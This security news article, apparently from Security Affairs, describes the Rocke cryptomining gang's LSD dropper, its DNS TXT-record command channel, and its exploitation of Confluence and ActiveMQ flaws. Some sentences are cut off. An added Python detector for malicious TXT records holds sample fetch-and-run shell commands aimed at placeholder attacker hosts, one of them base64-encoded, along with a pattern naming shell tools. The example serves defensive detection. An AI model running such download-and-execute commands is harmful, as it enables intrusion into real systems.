Chinese-speaking cybercrime gang Rocke, that carried out several large-scale
The cybercrime organization was first spotted
In March, the group was using a dropper dubbed LSD that was controlled via Pastebin, but since this summer the threat actors have moved their Command and Control (C2) infrastructure to a self-hosted solution.
The hackers use the malicious code to deliver a Monero (XMR) crypto miner that is detected by almost no antivirus solutions.
The Rocke group was also observed exploiting the CVE-2019-3396 flaw in Confluence servers to get remote code execution and deliver the miners.
“Rocke, a China-based cryptomining threat actor, has changed its Command and Control (C2) infrastructure away from Pastebin to a self-hosted solution during the summer of 2019.” reads the analysis published by the security firm Anomali. “The actor moved away from hosting the scripts on dedicated servers and instead started to use Domain Name System (DNS) text records. These records are accessed via normal DNS queries or DNS-over-HTTPs (
The use of self-hosted and DNS records
The group also improved its LSD dropper by adding code that exploits CVE-2016-3088 in ActiveMQ servers.
In order to ensure that only its miner is running on the infected machine, the group attempts to kill any other process with high CPU usage. The LSD malware checks the MD5 hash of the process's file to avoid killing its own instance running on the system.
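The DNS TXT record C2 channel described above can be hunted for in resolver logs. The following is an added example, not code from the Anomali report or from Security Affairs; its log format, domains, IPs and payloads are constructed placeholders.

```python
import base64
import math
import re
from collections import Counter

# Constructed resolver log lines (client, qname, qtype, answer). The attacker
# domains and IPs are placeholders, not indicators from the Anomali report.
_PAYLOAD = base64.b64encode(b"curl -fsSL http://198.51.100.9/m.sh | bash\n").decode()
SAMPLE_LOG = (
    '10.0.0.5 www.example.com A 93.184.216.34\n'
    '10.0.0.5 _dmarc.example.com TXT "v=DMARC1; p=reject; rua=mailto:dmarc@example.com"\n'
    '10.0.0.7 cfg.attacker-placeholder.test TXT "curl -fsSL http://198.51.100.9/ld.sh | sh"\n'
    f'10.0.0.7 k.attacker-placeholder.test TXT "{_PAYLOAD}"\n'
)

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) "?(.*?)"?$')
# Heuristics for a TXT answer that carries a script rather than SPF/DMARC/verification data.
SHELL_MARKERS = re.compile(r"(curl|wget|\|\s*(sh|bash)\b|chmod\s+\+x|base64\s+-d|/dev/tcp)")
BASE64_BLOB = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")

def shannon_entropy(s: str) -> float:
    """Bits per character; encoded or compressed payloads score high."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values()) if s else 0.0

def txt_reasons(answer: str) -> list[str]:
    """Return the heuristics a TXT answer trips (empty list means nothing suspicious)."""
    reasons = []
    if SHELL_MARKERS.search(answer):
        reasons.append("shell-command")
    if BASE64_BLOB.match(answer):
        reasons.append("base64-blob")
    if len(answer) >= 60 and shannon_entropy(answer) > 4.5:
        reasons.append("long-high-entropy")
    return reasons

def flag_txt_records(log_text: str) -> list[tuple[str, str, list[str]]]:
    """Scan resolver logs and return (client, qname, reasons) for suspicious TXT answers.
    Only lookups the resolver saw are covered: DNS-over-HTTPS queries bypass it
    unless the endpoint forwards them or the DoH traffic is inspected separately."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, qname, qtype, answer = m.groups()
        if qtype == "TXT" and (reasons := txt_reasons(answer)):
            hits.append((client, qname, reasons))
    return hits

if __name__ == "__main__":
    for client, qname, reasons in flag_txt_records(SAMPLE_LOG):
        print(f"{client} {qname} {', '.join(reasons)}")
```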
“Rocke keeps evolving its TTPs in attempts to remain undetected. By moving away from hosting scripts on Pastebin to self-hosted and DNS records, the threat actor is more protected against potential take-downs that could prevent ongoing malicious activity,” concludes Anomali Labs.
“It is expected that the group will continue to exploit more vulnerabilities to mine additional
Technical details, including Indicators of Compromise, are reported in the analysis published by Anomali.
(SecurityAffairs – Rocke cybercrime gang, mine